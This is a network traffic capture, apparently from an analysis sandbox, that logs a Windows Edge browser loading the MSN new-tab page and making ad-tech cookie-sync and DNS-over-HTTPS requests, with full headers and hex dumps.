2024-11-01 19:58:17 UTC	950	OUT	GET /b2?rn=1730491096841&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1537FB4C2D6A69131BC6EE662C9A68C5&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: UID=1F7d9f5bb2849a5509409d51730491097
2024-11-01 19:58:18 UTC	326	IN	HTTP/1.1 204 No Content Connection: close Date: Fri, 01 Nov 2024 19:58:18 GMT Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 e60ffc5cb1078c77d0ecabfc06b14cd0.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK50-P1 X-Amz-Cf-Id: oIajxTGWQB8R-Pyfzc4cdKwPTV3a8aT4ag3MkIrYkeclRcYWKirwiQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.11.20	56733	151.101.1.44	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:18 UTC	655	OUT	GET /sg/msn/1/cm?taboola_hm=1537FB4C2D6A69131BC6EE662C9A68C5&gdpr=0&gdpr_consent= HTTP/1.1 Host: trc.taboola.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:18 UTC	588	IN	HTTP/1.1 200 OK Connection: close Server: nginx Cache-Control: no-cache, no-store Pragma: no-cache P3P: policyref="http://trc.taboola.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true X-Fastly-to-NLB-rtt: 21942 Accept-Ranges: bytes Date: Fri, 01 Nov 2024 19:58:18 GMT Via: 1.1 varnish X-SERVICE-VERSION: v1 X-Served-By: cache-lga21987-LGA X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1730491099.525987,VS0,VE24 X-vcl-time-ms: 24 transfer-encoding: chunked
2024-11-01 19:58:18 UTC	4	IN	Data Raw: 32 62 0d 0a Data Ascii: 2b
2024-11-01 19:58:18 UTC	43	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 40 02 02 4c 01 00 3b Data Ascii: GIF89a!,@L;
2024-11-01 19:58:18 UTC	7	IN	Data Raw: 0d 0a 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.11.20	55312	64.202.112.31	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:18 UTC	664	OUT	GET /uidmappixel?ext_uid=1537FB4C2D6A69131BC6EE662C9A68C5&pname=MSN&gdpr=0&gdpr_consent= HTTP/1.1 Host: sync.outbrain.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:18 UTC	375	IN	HTTP/1.1 200 OK date: Fri, 01 Nov 2024 19:58:18 GMT content-length: 0 x-traceid: 358020e4f347e44b165faf10dc49e5f6 set-cookie: obuid=5a267d2a-eec8-4c4f-a834-60e1bb0f7034; Max-Age=7776000; Expires=Thu, 30 Jan 2025 19:58:18 GMT; Path=/; Domain=.outbrain.com;SameSite=None;Secure strict-transport-security: max-age=31536000; includeSubDomains; preload connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.11.20	52142	107.23.5.106	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:18 UTC	612	OUT	GET /sync/msn?gdpr=0&gdpr_consent= HTTP/1.1 Host: pr-bh.ybp.yahoo.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:18 UTC	777	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 19:58:18 GMT Content-Type: image/gif Content-Length: 43 Connection: close Age: 0 Strict-Transport-Security: max-age=31536000 Server: ATS Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only" X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy: sandbox; default-src 'self'; script-src 'none'; object-src 'none'; report-uri http://csp.yahoo.com/beacon/csp?src=generic Set-Cookie: A3=d=AQABBNoyJWcCEE6sUDnRrLB5mcUvlyfQZ-gFEgEBAQGEJmcvZwAAAAAA_eMAAA&S=AQAAAkko7K_AOeR5BJSedheMkMI; Expires=Sun, 2 Nov 2025 01:58:18 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
2024-11-01 19:58:18 UTC	43	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 cc cc cc ff ff ff 21 f9 04 05 14 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b Data Ascii: GIF89a!,D;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.11.20	49526	23.199.48.23	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:18 UTC	661	OUT	GET /cksync.php?type=nms&cs=3&ovsid=1537FB4C2D6A69131BC6EE662C9A68C5&gdpr=0&gdpr_consent= HTTP/1.1 Host: hbx.media.net Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:18 UTC	924	IN	HTTP/1.1 200 OK Server: Apache Content-Length: 59 Content-Type: image/gif Set-Cookie: visitor-id=3734926987834119000V10; Expires=Sat, 01 Nov 2025 19:58:18 GMT; domain=.media.net; Path=/; sameSite=none; secure=true Set-Cookie: data-nms=1537FB4C2D6A69131BC6EE662C9A68C5~~3;Expires=Sat, 01 Nov 2025 19:58:18 GMT;path=/;domain=.media.net; sameSite=none; secure=true p3p: CP="NON DSP COR NID CUR ADMa DEVo TAI PSA PSDo HIS OUR BUS COM NAV INT STA" P3P: CP: NON DSP COR NID CUR ADMa DEVo TAI PSA PSDo HIS OUR BUS COM NAV INT STA P3P: CP: NON DSP COR NID CUR ADMa DEVo TAI PSA PSDo HIS OUR BUS COM NAV INT STA Strict-Transport-Security: max-age=86400 ; includeSubDomains Strict-Transport-Security: max-age=604800 Alt-Svc: h3=":443"; ma=93600 x-mnet-hl2: E Expires: Fri, 01 Nov 2024 19:58:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 01 Nov 2024 19:58:18 GMT Connection: close
2024-11-01 19:58:18 UTC	43	IN	Data Raw: 47 49 46 38 37 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 04 0a 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b Data Ascii: GIF87a!,L;
2024-11-01 19:58:18 UTC	16	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.11.20	58641	104.19.131.76	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:18 UTC	670	OUT	GET /m?cdsp=516415&c=1537FB4C2D6A69131BC6EE662C9A68C5&mode=inverse&msn_src=ntp&&gdpr=0&gdpr_consent= HTTP/1.1 Host: cm.mgid.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:19 UTC	614	IN	HTTP/1.1 400 Bad Request Date: Fri, 01 Nov 2024 19:58:18 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 11 Connection: close CF-Cache-Status: DYNAMIC Set-Cookie: __cf_bm=JAnWol7EBMyBtUJzlElezij6v.Zch3vqnbsMFCRH.Cg-1730491098-1.0.1.1-sn.4JMHbyUSRRlP_ML2cO9uDkAUiqPcfNWIa8e3SmkhlV_2re3AniIP6eZph.QG.xCn1XjEoOMu9a2sqdQpkig; path=/; expires=Fri, 01-Nov-24 20:28:18 GMT; domain=.mgid.com; HttpOnly; Secure; SameSite=None Strict-Transport-Security: max-age=15552000; includeSubDomains; preload X-Robots-Tag: noindex Server: cloudflare CF-RAY: 8dbe75787d1d4267-EWR alt-svc: h3=":443"; ma=86400
2024-11-01 19:58:19 UTC	11	IN	Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.11.20	49965	52.223.22.214	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:18 UTC	649	OUT	GET /mapuid?suid=1537FB4C2D6A69131BC6EE662C9A68C5&sid=16&gdpr=0&gdpr_consent= HTTP/1.1 Host: eb2.3lift.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:19 UTC	638	IN	HTTP/1.1 302 Found Date: Fri, 01 Nov 2024 19:58:19 GMT Content-Length: 0 Connection: close Location: /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy= Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: tluidp=194935450074392175289; Path=/; Domain=.3lift.com; Max-Age=7776000; Expires=Thu, 30 Jan 2025 19:58:19 GMT; Secure; SameSite=None; Partitioned; P3P: policyref="http://cdn.3lift.com/w3c/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC" set-cookie: tluid=194935450074392175289; Max-Age=7776000; Expires=Thu, 30 Jan 2025 19:58:19 GMT; Path=/; Domain=.3lift.com; Secure; SameSite=None

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.11.20	61436	195.244.31.11	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:18 UTC	719	OUT	GET /visitor/sync?uid=9871605be8d4b2a982914bf5c9348e7b&name=MSN&visitor=1537FB4C2D6A69131BC6EE662C9A68C5&external=true&gdpr=0&gdpr_consent= HTTP/1.1 Host: visitor.omnitagjs.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:19 UTC	466	IN	HTTP/1.1 200 OK cache-control: no-cache, no-store, must-revalidate content-type: image/gif expires: 0 p3p: CP="CAO PSA OUR" pragma: no-cache set-cookie: ayl_visitor=4a12c07841c308383ab2aa32803ecea2; Path=/; Domain=omnitagjs.com; Max-Age=2592000; Secure; SameSite=None vary: Accept-Encoding x-content-type-options: nosniff date: Fri, 01 Nov 2024 19:58:18 GMT content-length: 49 x-envoy-upstream-service-time: 80 server: ayl-lb-usa02 connection: close
2024-11-01 19:58:19 UTC	49	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 91 00 00 ff ff ff ff ff ff fe 01 02 00 00 00 21 f9 04 04 14 00 ff 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b Data Ascii: GIF89a!,D;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.11.20	60181	68.67.179.153	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:19 UTC	862	OUT	GET /mapuid?member=280&user=172DCF8F4EDA69E736C3DAA54F2A68BD;&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D172DCF8F4EDA69E736C3DAA54F2A68BD%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1 Host: m.adnxs.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:19 UTC	1682	IN	HTTP/1.1 307 Redirection Server: nginx/1.23.4 Date: Fri, 01 Nov 2024 19:58:19 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" X-XSS-Protection: 0 Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness Location: https://m.adnxs.com/bounce?%2Fmapuid%3Fmember%3D280%26user%3D172DCF8F4EDA69E736C3DAA54F2A68BD%3B%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D172DCF8F4EDA69E736C3DAA54F2A68BD%252526gdpr%25253D0%252526gdpr_consent%25253D AN-X-Request-Uuid: 446e9b0a-dd31-4749-9293-639d512df7c8 Set-Cookie: XANDR_PANID=mLDufe4ECFAEFsQgYcsKZlE2nFMyGYTFnOhNjvK33P2XjUmUD_cZPLa7TipDJQaTQ73WciCTItIQdw2ORtvbKmFr0U_lnQMzReXJtlWyR3I.; SameSite=None; Path=/; Max-Age=7776000; Expires=Thu, 30-Jan-2025 19:58:19 GMT; Domain=.adnxs.com; Secure; Partitioned Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Fri, 20-Oct-2034 19:58:19 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned Set-Cookie: uuid2=2718088654971141100; SameSite=None; Path=/; Max-Age=7776000; Expires=Thu, 30-Jan-2025 19:58:19 GMT; Domain=.adnxs.com; Secure; HttpOnly X-Proxy-Origin: 191.96.150.229; 191.96.150.229; 570.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.11.20	56770	35.208.249.213	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:19 UTC	643	OUT	GET /cs/msn?id=1537FB4C2D6A69131BC6EE662C9A68C5&gdpr=0&gdpr_consent= HTTP/1.1 Host: trace.mediago.io Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:19 UTC	291	IN	HTTP/1.1 200 OK Set-Cookie: __mguid_=09ac98cf827dac221cnrbp00m2z5pxqq; Path=/; Domain=mediago.io; Max-Age=31536000; Secure; SameSite=None Date: Fri, 01 Nov 2024 19:58:19 GMT Content-Length: 0 Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.11.20	56718	172.64.41.3	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:19 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-01 19:58:19 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-01 19:58:19 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 01 Nov 2024 19:58:19 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8dbe757a3ed9c329-EWR alt-svc: h3=":443"; ma=86400
2024-11-01 19:58:19 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 82 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomHc)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.11.20	54103	172.64.41.3	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:19 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-01 19:58:19 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-01 19:58:19 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 01 Nov 2024 19:58:19 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8dbe757a3aee8c95-EWR alt-svc: h3=":443"; ma=86400
2024-11-01 19:58:19 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 11 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomHc)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.11.20	64543	172.64.41.3	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:19 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-01 19:58:19 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-01 19:58:19 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 01 Nov 2024 19:58:19 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8dbe757a59627cab-EWR alt-svc: h3=":443"; ma=86400
2024-11-01 19:58:19 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 27 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom' c)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.11.20	61833	9.9.9.9	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:19 UTC	233	OUT	POST /dns-query HTTP/1.1 Host: dns.quad9.net Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-01 19:58:19 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
